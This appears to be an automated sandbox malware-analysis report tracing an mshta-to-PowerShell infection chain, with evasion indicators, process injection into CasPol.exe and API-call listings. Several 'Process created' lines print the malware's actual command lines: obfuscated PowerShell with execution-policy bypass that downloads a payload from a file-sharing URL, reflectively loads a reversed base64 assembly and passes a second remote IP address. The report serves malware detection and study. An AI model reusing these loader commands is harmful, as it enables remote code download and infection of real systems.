                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 51 times across the powershell.exe instances)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated twice)

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040E54F Sleep,ExitProcess
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_004198C2 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (identical entry repeated 4 times)
                    Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4472
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5296
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6003
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3623
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1036
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 613
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4904
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9643
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API coverage: 8.8 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756 | Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672 | Thread sleep count: 6003 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704 | Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep count: 3623 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084 | Thread sleep count: 4904 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8080 | Thread sleep count: 4891 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112 | Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4484 | Thread sleep count: 343 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4484 | Thread sleep time: -1029000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4484 | Thread sleep count: 9643 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4484 | Thread sleep time: -28929000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00406AC2 FindFirstFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (identical entry repeated 4 times)
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: mshta.exe, 00000000.00000002.1693659509.0000000000B05000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
                    Source: CasPol.exe, 0000000D.00000002.4110277483.0000000000E62000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                    Source: powershell.exe, 00000001.00000002.1829521422.0000000007F4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1826446368.0000000007131000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000009.00000002.2099966491.00000000074FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API call chain: ExitProcess graph end node (graph_13-46801)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00442554 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0044E92E GetProcessHeap
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (identical entry repeated 4 times)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00433CD7 SetUnhandledExceptionFilter

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match | File source: amsi32_7492.amsi.csv, type: OTHER
                    Source: Yara match | File source: amsi32_8032.amsi.csv, type: OTHER
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: AFE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00410F36 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00418754 mouse_event
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created (case-folded copy of the mshta.exe command line above; the base64 argument is lowercased in this copy and therefore cannot be decoded from it): "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfm1ufpiniagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhzeqtvhlwzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izvjeruzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1pti5ebgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbalhn0cmluzyagicagicagicagicagicagicagicagicagicagicagighwsghstndblhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifrsdedkuej0zsx1aw50icagicagicagicagicagicagicagicagicagicagicagaefvyvrqusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbjtwfreeftwwhssyk7jyagicagicagicagicagicagicagicagicagicagicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicaginhaqm5vrsigicagicagicagicagicagicagicagicagicagicagicattmfnrxnqywnlicagicagicagicagicagicagicagicagicagicagicagq0nzvwlptklmicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrtnvbayjy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdqumty4ljq2lji2lze0mjivymvzdg9mdghpbmdzd2l0agvudglyzxrpbwvnaxzlbmvic3r0aglnbnn0b2rvd2l0agdyzwf0lnrjriisiirfbly6qvbqrefuqvxizxn0b2z0agluz3n3axrozw50axjldgltzwdpdmvuzwjzdhroawduc3rvzg93axrozy52qnmildasmck7u3rhclqtc2xfrvaomyk7swkgicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgjlc3rvznroaw5nc3dpdghlbnrpcmv0aw1lz2l2zw5lynn0dghpz25zdg9kb3dpdghnlnzccyi='+[char]0x22+'))')))"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 13_2_00433E0A cpuid 13_2_00433E0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,13_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,13_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,13_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,13_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoA,13_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,13_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,13_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,13_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,13_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,13_2_00450E6A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
